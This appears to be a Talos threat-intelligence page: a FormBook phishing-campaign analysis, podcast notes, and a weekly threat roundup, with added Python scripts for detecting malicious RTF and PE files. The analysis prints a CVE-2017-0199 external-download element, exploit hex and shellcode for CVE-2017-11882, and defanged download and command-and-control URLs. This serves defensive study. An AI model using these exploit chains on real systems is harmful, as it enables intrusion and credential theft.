    Cisco Talos has been tracking a new campaign involving the FormBook malware since May 2018 that utilizes four different malicious documents in a single phishing email. FormBook is an inexpensive stealer available as "malware as a service." This means an attacker can purchase a compiled piece of malware based on their desired parameters. This is commonplace with crimeware and stealer type malware such as FormBook. It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots.



    The author put a lot of effort into the infection vector, using multiple malicious documents in a single phishing email. The author also mixed different file formats (PDF and Microsoft Office document) and used two public Microsoft Office exploits (CVE-2017-0199 and CVE-2017-11882) in order to drop the final payload on the targeted system. The final payload was downloaded during the campaign from a small Japanese file-sharing platform (hosted in the Netherlands). The platform owner has since deleted the malicious payload binaries from their system. Here is the infection workflow:

    We identified an infrastructure overlap between this campaign and a previous campaign we published in February 2017 relating to Pony malware, which utilized Microsoft Publisher files to deliver its payload. Because of this overlap in infrastructure, the actor behind these two attacks is potentially the same. If that is the case, the actor has been able to switch between Pony and FormBook and continue their malicious activities for more than a year.

    Infection Vector


    Phishing Campaign


    This campaign starts with a malicious email containing two attachments. Here is a snippet of the email:

    The email pretends to be an order sent from the sales department of a company located in Spain. The website's details and phone number appear to have been copied from that of a genuine company.

    The email contains two attachments:

    • A blank malicious Microsoft Office document template file. (.dotm)
    • A malicious PDF document that is also blank. (.pdf)

    First Office MalDoc (Attached)


    The email contains two attachments as mentioned. One of these is a Microsoft Office document template file. This file type is normally used to share templates. The 'normal.dotm' file is the default Microsoft Word template that opens when Word is launched. The attacker, however, does not use the .dotm file format to share templates, but rather to download an additional Office document.

    If an example document from the campaign, named "STMORDER-442799.dotm," is opened, it appears blank. However, like most Office documents, if the file is unzipped and opened, you can access the attributes and XML information. This is where the attacker leverages CVE-2017-0199 to trigger an external download by abusing the relationship elements within "STMORDER-442799\word\_rels\document.xml.rels." Despite the file appearing to be blank, it does contain a large amount of XML information. We see the <Relationship> elements being abused:
    <Relationship Id="_id_2970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="hxxps://pomf[.]pyonpyon[.]moe/cgcvsc.doc"/></Relationships>
    This will cause the following document to be downloaded and executed from a Japanese file-hosting platform.

    At the time of publishing, this file is no longer available and trying to view it results in a 404 error. The platform maintainer of PyonPyon.moe provides a list of malware that has been removed from the hosting platform — this can be found here. Within this data, we can identify our attempted download of the .doc file, among others related to this campaign, which were removed on the same day, June 8:
    We were able to obtain multiple .doc files related to this campaign, which we will discuss later on. These .doc files are in rich text format (RTF) and leverage CVE-2017-11882.

    PDF document (Attached)


    Also, attached to the initial email is a PDF file which contains a JavaScript object:
    this.exportDataObject({ cName: "mine001.dotm", nLaunch: 2 });
    This code launches a file embedded within the PDF document. In our case, the file is an Office document named "mine001.dotm."

    Second Office MalDoc (Embedded)


    The embedded Office document is exactly the same as the attached document discussed above. We don't know why the author of this campaign puts the same file in two separate locations, or whether it's on purpose or a mistake made during the phishing generation stage. It's possible the actor did not intend to attach both the DOTM and the PDF.

    Third Office MalDoc (Downloaded)


    The final malicious Office document is an RTF document. This RTF document contains an object linking and embedding (OLE) stream at the offset 0x9F (header d0 cf 11 e0 a1 b1 1a e1):
    00000040  36 39 30 36 64 30 34 33  30 32 30 30 30 30 30 30  |6906d04302000000|
    00000050 31 37 30 30 30 30 30 30 37 32 34 37 35 35 33 30 |1700000072475530|
    00000060 33 32 37 37 34 65 37 35 36 64 37 36 33 36 34 66 |32774e756d76364f|
    00000070 35 30 36 66 36 32 34 62 37 34 35 38 34 37 33 32 |506f624b74584732|
    00000080 37 36 35 31 30 30 30 30 30 30 30 30 30 30 30 30 |7651000000000000|
    00000090 30 30 30 30 30 30 30 30 31 30 30 30 30 30 64 30 |00000000100000d0|
    000000a0 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 |cf11e0a1b11ae100|
    000000b0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
    000000c0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 |000000000000003e|
    000000d0 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 |000300feff090006|
    000000e0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
    000000f0 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 |0000000100000001|
    00000100 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000|
    We have the beginning of the OLE compound file (CF) — named OLECF — object.

    This OLECF object contains a compound file binary format (CFBF) object. This file format is described here. This object is linked to the COM object "0002ce02-0000-0000-c000-000000000046":
    00000400  52 00 6f 00 6f 00 74 00  20 00 45 00 6e 00 74 00  |R.o.o.t. .E.n.t.|
    00000410 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 |r.y.............|
    00000420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    *
    00000440 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00 |................|
    00000450 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F|
    00000460 00 00 00 00 00 00 00 00 00 00 00 00 d0 e9 36 77 |..............6w|
    00000470 7f fc d3 01 03 00 00 00 c0 07 00 00 00 00 00 00 |................|
    00000480 01 00 4f 00 6c 00 65 00 31 00 30 00 4e 00 61 00 |..O.l.e.1.0.N.a.|
    00000490 74 00 69 00 76 00 65 00 00 00 00 00 00 00 00 00 |t.i.v.e.........|
    000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
    This CLSID is the ID of the Equation Editor as mentioned by Microsoft. Finally, here is where and how the exploit is executed:
    00000800 98 07 00 00 03 d4 01 6a 72 0a 01 08 7f a9 b8 c3 |.......jr.......|
    00000810 42 ba ff f7 d0 8b 38 8b 37 bd c6 98 b9 ff f7 d5 |B.....8.7.......|
    00000820 8b 4d 77 56 ff d1 05 63 d6 2d 0b 2d 4d d5 2d 0b |.MwV...c.-.-M.-.|
    00000830 ff e0 fa d3 6e 4a c9 6a 83 53 e8 d1 41 00 1e b6 |....nJ.j.S..A...|
    00000840 29 1d e6 71 de 92 60 23 40 9d 40 0e 7a d8 9a d6 |)..q..`#@.@.z...|
    00000850 26 43 86 98 e0 c4 4e b8 1d 7d 82 46 ce 45 07 be |&C....N..}.F.E..|
    00000860 82 15 f0 31 ec 1e 49 93 a2 d4 ef b5 da ae e8 39 |...1..I........9|
    00000870 ff d3 ab 65 88 29 2b 4e be b9 ec 16 e5 7f ab d6 |...e.)+N........|
    00000880 08 a7 ec 69 51 38 1f 97 27 27 7d f9 f3 f2 65 83 |...iQ8..''}...e.|
    The first four bytes (98 07 00 00, shown in red in the original dump) are the stream length.

    The next byte (03, blue) begins the Equation Editor MTEF header.

    The font record (green) starts with the 0x08 tag at offset 0x80b. This vulnerability is an overflow of the font name (grey) that follows it. The overflow redirects control flow to a RET instruction at the address 0x0041d1e8 (pink; the bytes e8 d1 41 00 at offset 0x83a).

    Finally, a shellcode is executed.

    Here is the first stage of the shellcode:
    user@laptop:$ rasm2 -d B8C342BAFFF7D08B388B37BDC698B9FFF7D58B4D7756FFD10563D62D0B2D4DD52D0BFFE0
    mov eax, 0xffba42c3
    not eax
    mov edi, dword [eax]
    mov esi, dword [edi]
    mov ebp, 0xffb998c6
    not ebp
    mov ecx, dword [ebp + 0x77]
    push esi
    call ecx
    add eax, 0xb2dd663
    sub eax, 0xb2dd54d
    jmp eax
    This stage calls GlobalLock() (the first call) and then jumps into the second stage of the shellcode (highlighted in orange in the original hex dump).

    The purpose is to download and execute a binary located on a compromised WordPress website (hxxp://irishlebanese[.]com/wp-admin/images/eight/mine001.exe).
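    The RTF structure walked through above (hex-encoded object data, the OLECF header, the Equation Editor CLSID in the Root Entry, and an MTEF font record whose name is far too long) can be turned into a triage check. The following is an added example, not code from the Talos post; the 40-byte font-name threshold, the MTEF header stub and the sample RTF it builds are constructed assumptions.

```python
"""Triage check for RTF files carrying a hex-encoded OLE object that binds
the Equation Editor (CLSID 0002ce02-0000-0000-c000-000000000046).

Added example; not code from the Talos post. The 40-byte font-name threshold,
the MTEF header stub and the sample RTF are constructed assumptions."""
import binascii
import re

# Compound file header seen at offset 0x9F of the document in the post.
OLECF_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
# The Equation Editor CLSID as it is laid out on disk (first three fields
# little-endian), i.e. the byte sequence in the Root Entry dump above.
EQNEDT_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
MTEF_FONT_TAG = 0x08          # MTEF font record: tag, typeface, style, name, NUL
MAX_SANE_FONT_NAME = 40       # assumption: legitimate font names are far shorter

# \objdata carries the object as a run of hex digits, often wrapped across lines.
_OBJDATA = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+?)\}")


def extract_ole_objects(rtf):
    """Return the decoded bytes of every \\objdata object in an RTF blob."""
    objects = []
    for match in _OBJDATA.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", match.group(1))
        if len(hexdata) % 2:           # tolerate a dangling nibble
            hexdata = hexdata[:-1]
        try:
            objects.append(binascii.unhexlify(hexdata))
        except binascii.Error:
            continue
    return objects


def longest_font_name(blob):
    """Length of the longest NUL-terminated name following an MTEF font tag."""
    longest = 0
    for idx, byte in enumerate(blob):
        if byte != MTEF_FONT_TAG:
            continue
        start = idx + 3                # skip tag, typeface and style bytes
        end = blob.find(b"\x00", start)
        if end == -1:
            end = len(blob)
        longest = max(longest, end - start)
    return longest


def analyze_object(blob):
    """Flag an object that binds Equation Editor and carries an oversized font name."""
    binds_eqnedt = EQNEDT_CLSID in blob
    font_len = longest_font_name(blob) if binds_eqnedt else 0
    return {
        "olecf": OLECF_MAGIC in blob,
        "equation_editor": binds_eqnedt,
        "font_name_len": font_len,
        "suspicious": binds_eqnedt and font_len > MAX_SANE_FONT_NAME,
    }


def analyze_rtf(rtf):
    """Analyse every embedded object; non-RTF input yields no findings."""
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return []
    return [analyze_object(blob) for blob in extract_ole_objects(rtf)]


def build_sample(font_name):
    """Construct a minimal RTF with one Equation Editor object (test data only)."""
    ole = (b"\x01\x05\x00\x00\x02\x00\x00\x00"   # constructed OLE1 prefix
           + OLECF_MAGIC + b"\x00" * 16
           + EQNEDT_CLSID + b"\x00" * 16
           + b"\x03\x01\x01\x01\x01\x01"         # constructed MTEF header stub
           + bytes([MTEF_FONT_TAG, 0x01, 0x01]) + font_name + b"\x00")
    hexdata = binascii.hexlify(ole)
    wrapped = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return b"{\\rtf1{\\object\\objemb{\\*\\objdata " + wrapped + b"}}}"


if __name__ == "__main__":
    for label, name in (("benign", b"Times New Roman"), ("oversized", b"A" * 60)):
        print(label, analyze_rtf(build_sample(name)))
```

    Run against a real sample, the check only tells you that an Equation Editor object with an abnormal font name is present; the decoded object should still go to a sandbox or an OLE parser for confirmation.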


    Final payload: FormBook


    The final payload is located on a compromised WordPress website (hxxp://irishlebanese[.]com/). The malware author stored many PE32 files on this server, some of which are still available. We have included more than 30 hashes of files stored on this server in the IOCs section. The most recent samples are FormBook samples.

    FormBook is an inexpensive stealer available as "malware as a service." It is able to record keystrokes, steal passwords (stored locally and in web forms) and can take screenshots. This post does not describe the malware in-depth, since there are excellent posts on the malware written by other researchers.

    Overlaps with previous campaigns


    In February 2017, we published an article about another stealer using Publisher and a public exploit to compromise systems. We found three interesting samples related to this case and our current FormBook case:

    • 5aac259cb807a4c8e4986dbc1354ef566a12ced381b702a96474c0f8ff45f825 (located at hxxp://irishlebanese[.]com/wp-admin/admin/dor001.exe in May 2018)
    • 82ce499994e4b2ee46e887946ef43f18b046639e81dfe1d23537ce6a530d8794 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)
    • 8f6813634cb08d6df72e045294bf63732c0753f79293f1c9b2765f686f699a72 (located at hxxp://irishlebanese[.]com/wp-admin/admin/mine001.exe in May 2018)


    These three samples use the same FormBook infrastructure and the Pony infrastructure mentioned in our previous article:

    • hxxp://alphastand[.]top/alien/fre.php -> command and control (C2) server from 2017
    • hxxp://ukonlinejfk[.]ru/mine/fre.php
    • hxxp://alphastand[.]trade/alien/fre.php -> C2 server from 2017
    • hxxp://igtckeep[.]com/dor/fre.php
    • hxxp://alphastand[.]win/alien/fre.php -> C2 server from 2017
    • hxxp://kbfvzoboss[.]bid/alien/fre.php -> C2 server from 2017
    • hxxp://www.cretezzy[.]com/do/ -> FormBook C2 server
    • hxxp://www.beemptty[.]com/se/ -> FormBook C2 server


    The infrastructure sharing suggests that this is a common actor currently using two different stealers. Based on the timeline, we assume that the actor is currently moving from Pony to FormBook, another stealer.

    Conclusion


    This case shows us that malicious actors play with multiple file formats and embedded objects. In this campaign, the author used a PDF with an embedded Office document template using a vulnerability in order to download an additional Office RTF document, and then a second vulnerability and exploit in order to compromise the target. The attacker used an unfamiliar file-sharing platform in order to store the malicious document and a compromised WordPress site in order to store the final payload. We did notice that the file-sharing platform is responsive, removing the malicious files quickly and stopping the infection chain.

    Some technical elements, such as infrastructure sharing, show us that the actor behind this campaign is probably the same actor behind a campaign we described one year ago. Last month, the actor used two stealers in parallel on the same infrastructure. Based on the information we have today, he/she no longer uses Pony, but has switched to FormBook in order to steal information from compromised systems.

    Coverage


    Additional ways our customers can detect and block this threat are listed below.
    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

    Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

    IOCs

    PDF

    8f859c1a9965427848315e9456237e9c018b487e3bd1d632bce2acd0c370341e

    Embedded And Attached dotm

    04f093a3b867918dce921fe2ba40dcdae769b35dbce3047aacdb151e2208ea5c

    Malicious Document Hosted On The Files Sharing Platform


    PE32 Hosted On The irishlebanese Website



    C2 Servers


    Overlaps Samples


    Beers with Talos EP31 - Live from Cisco Live! - VPNFilter and Our First Summit Recap



    Beers with Talos (BWT) Podcast Episode 31 is now available. Download this episode and subscribe to Beers with Talos:

    If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

    EP31 Show Notes: 

    Recorded June 12, 2018 — This is a special episode for two reasons! To start, we recorded this live in one take from CiscoTV Studio B at Cisco Live! in Orlando, Florida — which leads to the second reason, there is video of this episode in the show notes below. Join us as we cover the VPNFilter update Talos released June 6, and we recap the inaugural Cisco Talos Threat Research Summit.

    Ed. Note - This is what no content editing looks like...
    TL;DL — The summit went great, Lurene’s keynote was as amazing as advertised, Craig has no idea how video switchers work, Mitch got a bad haircut just before doing a video podcast, VPNFilter is still bad news and can really only get worse, there’s lots of random Segway-type scooter-things milling about Cisco Live! Like, an inordinate amount.

    The Timeline:

    The Roundtable

    07:20 - Craig: TTRS went shockingly well
    09:03 - Joel: Surviving in Occupied Orlando #BanPepsi
    12:29 - Nigel: The world is at a standstill
    14:18 - Matt: The U.S. isn’t playing in the World Cup so… Go Egypt?

    The Topics

    19:23 - TTRS recap: Highlights, key points, and a glimpse of what comes next
    34:19 - VPNFilter update: Discussing the updated model list, clearing up some common confusion, and the later discovered stage 2/3 modules.

    ==========

    Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC). Special Guest Nick Biasini (@infosec_nick).
    Hosted by Mitch Neff (@MitchNeff).

    Find all episodes:
    http://cs.co/talospodcast

    Subscribe via iTunes (and leave a review!)
    http://cs.co/talositunes

    Check out the Talos Threat Research Blog:
    http://cs.co/talosresearch

    Subscribe to the Threat Source newsletter:
    http://cs.co/talosupdate

    Follow Talos on Twitter:
    http://cs.co/talostwitter

    Give us your feedback and suggestions for topics:
    beerswithtalos@cisco.com

    Threat Roundup for June 16-22



    As usual, we are bringing you the weekly Threat Roundup to highlight the most prevalent threats we've seen between June 15 and 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

    As a reminder, the information provided for the following threats in this post is non-exhaustive and is current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.


    The most prevalent threats highlighted in this roundup are:

    • Win.Dropper.Generic-6584427-0
      Dropper
      This dropper attempts to allocate a memory region with the flag PAGE_EXECUTE_READWRITE to later inject malicious code and then execute it. These samples also contain TLS callback entries, which allow malware authors to execute malicious code before the debugger has a chance to pause at the traditional entry point.
    • Win.Dropper.Fareit-6584428-0
      Dropper
      Fareit dropper injects code into legitimate system processes, usually through an evasion technique called process hollowing. Some samples may use VB scripts to carry out some of their malicious activities, and they modify autorun registry keys to maintain persistence on the host.
    • Win.Dropper.Zbot-6584477-0
      Dropper
      Zbot (AKA Zeus bot) is info-stealing malware targeting users' banking credentials. You can read more on our blog: https://talosintelligence.com/zeus_trojan.
    • Win.Trojan.Generic-6584512-1
      Trojan
      This trojan is sometimes related to the Emotet malware family. It creates a copy of itself in system directories such as C:\Windows\SysWOW64\. It is also capable of uploading files with information about the infected system to remote servers, and it registers that file as a service under the registry's CurrentControlSet\Services key.
    • Win.Malware.Installcore-6584374-1
      Malware
      This adware creates a copy of itself in %APPDATA% with the "tmp" extension. Some samples contain a library reference to the SetWindowsHookEx function, which can be used to monitor keyboard or other user input and could indicate keylogger capabilities.
    • Win.Trojan.Jaik-6584366-1
      Trojan
      Jaik contains a library reference to the Visual Basic runtime DLL, indicating the sample carries code compiled with Visual Basic (the runtime hosts compiled VB programs; it is not a script interpreter). It also attempts to allocate a memory region with the flag PAGE_EXECUTE_READWRITE to later inject malicious code and then execute it.
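
    Several of the descriptions above rest on static properties of the PE file: TLS callback entries and RWX memory for the generic dropper, process-hollowing imports for Fareit, a SetWindowsHookEx import for Installcore, and a Visual Basic runtime reference for Jaik. The triage script below, written for this page as an added example (it is not Talos's detection logic or any tool from the roundup), parses PE32 headers with the Python standard library only and reports those properties. The import watchlist is an assumption assembled from the behaviours listed above, and the PE it runs on is a constructed test image, not a roundup sample. A PAGE_EXECUTE_READWRITE allocation is a runtime behaviour that only a sandbox will see; the writable+executable section check is the nearest static analogue.

```python
import struct

# Hypothetical import watchlist (an assumption for this example, not a Talos
# signature) drawn from the behaviours the roundup describes.
SUSPICIOUS_IMPORTS = {"SetWindowsHookExA", "SetWindowsHookExW",          # input hooking (Installcore)
                      "NtUnmapViewOfSection", "ZwUnmapViewOfSection",    # process hollowing (Fareit)
                      "WriteProcessMemory", "SetThreadContext", "ResumeThread", "VirtualAllocEx"}
SUSPICIOUS_DLLS = {"msvbvm60.dll"}                                       # Visual Basic 6 runtime (Jaik)
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000


def triage_pe32(data: bytes) -> dict:
    """Static triage of an in-memory PE32 file: RWX sections, TLS callbacks, imports."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    assert data[e_lfanew:e_lfanew + 4] == b"PE\0\0", "not a PE image"
    coff = e_lfanew + 4
    nsections, opt_size = struct.unpack_from("<H", data, coff + 2)[0], struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                   # optional header follows the 20-byte COFF header
    assert struct.unpack_from("<H", data, opt)[0] == 0x10B, "PE32 only (PE32+ TLS fields are 8 bytes)"
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    def directory(index):                             # data directories start at opt+96, 8 bytes each
        return struct.unpack_from("<II", data, opt + 96 + 8 * index)

    sections = []
    for i in range(nsections):                        # 40-byte section headers follow the optional header
        sh = opt + opt_size + 40 * i
        name = data[sh:sh + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, sh + 8)
        chars = struct.unpack_from("<I", data, sh + 36)[0]
        sections.append((name, vaddr, max(vsize, rawsize), rawptr, chars))
    def rva_to_off(rva):                              # relative virtual address -> file offset
        for _, vaddr, size, rawptr, _ in sections:
            if vaddr <= rva < vaddr + size:
                return rawptr + (rva - vaddr)
        raise ValueError(f"RVA {rva:#x} is not backed by any section")
    def cstring(off):
        return data[off:data.index(b"\0", off)].decode("ascii", "replace")

    report = {"rwx_sections": [], "tls_callbacks": [], "imports": {}, "flags": []}
    for name, *_, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            report["rwx_sections"].append(name)

    tls_rva, _ = directory(9)                         # IMAGE_DIRECTORY_ENTRY_TLS
    if tls_rva:
        # AddressOfCallBacks (4th DWORD of IMAGE_TLS_DIRECTORY32) is a VA of a NULL-terminated VA array;
        # the loader runs every entry before AddressOfEntryPoint, which is why debuggers miss them.
        cb_va = struct.unpack_from("<I", data, rva_to_off(tls_rva) + 12)[0]
        off = rva_to_off(cb_va - image_base)
        while (cb := struct.unpack_from("<I", data, off)[0]) != 0:
            report["tls_callbacks"].append(cb)
            off += 4

    imp_rva, _ = directory(1)                         # IMAGE_DIRECTORY_ENTRY_IMPORT
    if imp_rva:
        desc = rva_to_off(imp_rva)
        while True:                                   # 20-byte IMAGE_IMPORT_DESCRIPTORs, all-zero terminator
            oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
            if not name_rva:
                break
            dll, funcs, thunk = cstring(rva_to_off(name_rva)), [], rva_to_off(oft or ft)
            while (entry := struct.unpack_from("<I", data, thunk)[0]) != 0:
                if not entry & 0x80000000:            # by name: RVA of IMAGE_IMPORT_BY_NAME (2-byte hint, then name)
                    funcs.append(cstring(rva_to_off(entry) + 2))
                thunk += 4
            report["imports"][dll] = funcs
            desc += 20

    if report["rwx_sections"]:
        report["flags"].append("writable+executable section(s): " + ", ".join(report["rwx_sections"]))
    if report["tls_callbacks"]:
        report["flags"].append(f"{len(report['tls_callbacks'])} TLS callback(s) run before the entry point")
    for dll, funcs in report["imports"].items():
        if dll.lower() in SUSPICIOUS_DLLS:
            report["flags"].append(f"imports {dll}")
        report["flags"].extend(f"imports {dll}!{f}" for f in funcs if f in SUSPICIOUS_IMPORTS)
    return report


def build_sample_pe() -> bytes:
    """Constructed input (not malware, not a roundup sample): a minimal PE32 whose single RWX
    section holds a TLS directory with two callbacks and an import of user32!SetWindowsHookExA."""
    base, rva, raw = 0x400000, 0x1000, 0x200
    hdr = bytearray(raw)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                  # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # COFF: i386, one section
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                                  # PE32 magic
    struct.pack_into("<III", hdr, opt + 28, base, 0x1000, raw)               # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", hdr, opt + 56, 0x2000, raw)                      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)                                # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 8 * 1, rva + 0x40, 40)           # import directory
    struct.pack_into("<II", hdr, opt + 96 + 8 * 9, rva, 24)                  # TLS directory
    sh = opt + 0xE0
    hdr[sh:sh + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", hdr, sh + 8, 0x200, rva, 0x200, raw)           # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<I", hdr, sh + 36, 0xE0000020)                         # CODE | EXECUTE | READ | WRITE
    sec, va = bytearray(0x200), base + rva
    struct.pack_into("<IIIIII", sec, 0x00, va + 0x100, va + 0x104, va + 0x108, va + 0x20, 0, 0)  # IMAGE_TLS_DIRECTORY32
    struct.pack_into("<III", sec, 0x20, va + 0x150, va + 0x160, 0)           # two callback VAs, NULL-terminated
    struct.pack_into("<IIIII", sec, 0x40, rva + 0x70, 0, 0, rva + 0xB0, rva + 0x70)  # import descriptor; next 20 bytes stay zero
    struct.pack_into("<II", sec, 0x70, rva + 0x90, 0)                        # thunk array shared as ILT and IAT
    sec[0x90:0xA4] = b"\0\0SetWindowsHookExA\0"                              # hint + function name
    sec[0xB0:0xBB] = b"user32.dll\0"
    return bytes(hdr + sec)
```

    Running `triage_pe32(build_sample_pe())["flags"]` yields three findings: the RWX `.text` section, two TLS callbacks, and the `user32.dll!SetWindowsHookExA` import. On a real sample the same three checks are the first thing to confirm before spending sandbox time, with the caveat that packers routinely produce RWX sections on their own, so the section flag is a triage hint rather than a verdict.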

    Threats


    Win.Dropper.Generic-6584427-0



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5309edc19dc6c14cbad5ba06bdbdabd9
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\82fa2a40d311b5469a626349c16ce09b
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9e71065376ee7f459f30ea2534981b83
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a88f7dcf2e30234e8288283d75a65efb
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d33fc3b19a738142b2fc0c56bd56ad8c
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\df18513432d1694f96e6423201804111
